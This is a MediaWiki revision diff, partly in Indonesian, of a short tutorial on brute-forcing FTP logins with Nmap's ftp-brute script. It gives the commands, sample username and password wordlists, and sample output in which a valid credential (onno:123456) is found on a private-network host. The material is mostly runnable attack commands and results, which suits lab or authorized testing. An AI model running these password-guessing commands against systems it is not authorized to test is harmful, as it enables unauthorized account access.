Difference between revisions of "Nmap: brute force hack ftp password"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
Line 27: | Line 27: | ||
nmap -p21 –script ftp-brute.nse –script-args \ | nmap -p21 –script ftp-brute.nse –script-args \ | ||
userdb=user.txt,passdb=pass.txt 192.168.3.47 | userdb=user.txt,passdb=pass.txt 192.168.3.47 | ||
+ | |||
+ | Contoh Output | ||
+ | |||
+ | Starting Nmap 7.80 ( https://nmap.org ) at 2022-11-03 10:32 WIB | ||
+ | Nmap scan report for 192.168.3.47 | ||
+ | Host is up (0.00040s latency). | ||
+ | |||
+ | PORT STATE SERVICE | ||
+ | 21/tcp open ftp | ||
+ | | ftp-brute: | ||
+ | | Accounts: | ||
+ | | onno:123456 - Valid credentials | ||
+ | |_ Statistics: Performed 15 guesses in 6 seconds, average tps: 2.5 | ||
+ | |||
+ | Nmap done: 1 IP address (1 host up) scanned in 6.30 seconds |
Latest revision as of 10:33, 3 November 2022
Script types: portrule Categories: intrusive, brute Download: https://svn.nmap.org/nmap/scripts/ftp-brute.nse
isi
user.txt
admin root onno dll
isi
pass.txt
123456789 123456 12345 dll
nmap -p21 –script ftp-brute.nse –script-args \ userdb=/root/user.txt,passdb=/root/pass.txt 192.168.1.105
nmap -p21 –script ftp-brute.nse –script-args \ userdb=user.txt,passdb=pass.txt 192.168.3.47
Contoh Output
Starting Nmap 7.80 ( https://nmap.org ) at 2022-11-03 10:32 WIB Nmap scan report for 192.168.3.47 Host is up (0.00040s latency). PORT STATE SERVICE 21/tcp open ftp | ftp-brute: | Accounts: | onno:123456 - Valid credentials |_ Statistics: Performed 15 guesses in 6 seconds, average tps: 2.5 Nmap done: 1 IP address (1 host up) scanned in 6.30 seconds